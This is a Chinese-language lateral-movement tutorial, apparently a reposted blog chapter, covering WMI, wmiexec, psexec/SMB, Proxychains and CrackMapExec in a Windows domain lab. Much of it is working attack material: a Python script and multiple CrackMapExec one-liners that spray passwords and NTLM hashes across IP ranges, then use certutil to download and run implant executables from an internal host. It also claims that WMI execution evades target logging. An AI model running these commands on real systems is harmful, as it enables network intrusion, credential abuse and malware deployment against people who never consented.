本文主要是介绍129- 横向移动WmicscriptSmbCrackMapExecProxyChainsImpacket,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
本章任然使用上一节的拓扑
章节点
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL,
域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等
#域信息收集-目标&用户&凭据&网络
#域横向移动-wmi-自带&命令&套件&插件
1、wmi
wmi全称Windows Management Instrumentation
WMI是通过135端口进行利用,支持用户名明文不支持hash的方式进行认证,
并且该方法不会在目标日志系统留下痕迹。
我在网上看到这个信息:
win10 使用该命令会报错
‘wmic’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic
只需要添加C:\Windows\System32\wbem 到环境变量——系统变量的Path变量
2、cscript
3、wmiexec-impacket
可以使用hash值进行操作
4、SMB
使用psexec 这是微软官方的工具不会被杀,可以直接去官网下载pstools
需要主机上开启了smb服务才可以
使用smb有时候需要管理员权限(这里的管理员是运行此命令的管理员权限,不知道在攻击上有关系没)才可以,使用此命令也是可以反弹回一个cmd
使用专门的psexec程序或者smbexec.py脚本进行移动还可以使用hash进行操作
最后可以使用cs自带的psexec进行横向移动
5、service
这个命令敲完也是没有回显的
6、Windows+Proxifier+Python_exp
和上期的思路一样通过代理在本机上写脚本去跑
import osips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']def down():for ip in ips:wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe"'%ipprint(wmi_exec)os.system(wmi_exec)def zx():for ip in ips:wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "c:/webserver4444.exe"'%ipprint(wmi_exec)os.system(wmi_exec)if __name__ == '__main__':down()zx()7、域横向移动-工具-Proxychains&CrackMapExec
CrackMapExec
Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://mpgn.gitbook.io/crackmapexec/
部分案例:CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具 - FreeBuf网络安全行业门户
下载对应release,建立socks连接,设置socks代理,配置规则,调用!
Linux Proxychains使用
安装使用:proxychains 安装和proxychains 代理nmap-CSDN博客
代理配置:Proxychains.conf 代理调用:Proxychains 命令
使用
密码喷射域登录(验证用户名密码是否正确,默认域用户):
- proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123'
密码喷射本地登录(验证用户名密码是否正确):
- proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' --local-auth
密码喷射本地登录命令执行:
- proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'whoami' --local-auth
hash喷射域登录命令执行:
- proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 'ccef208c6485269c20db2cad21734fe7' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe'
cs上线为反向连接,需要代理转发,转发上线
密码喷射本地登录命令执行上线:
- proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe' --local-auth
密码喷射域登录命令执行上线:
- proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'
密码喷射本地&域登录命令执行全自动上线:
写两个字典,一个放用户名,另一个放密码
- proxychains crackmapexec smb 192.168.20.10-30 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'
另外kali上面自带了这个
这篇关于129- 横向移动WmicscriptSmbCrackMapExecProxyChainsImpacket的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
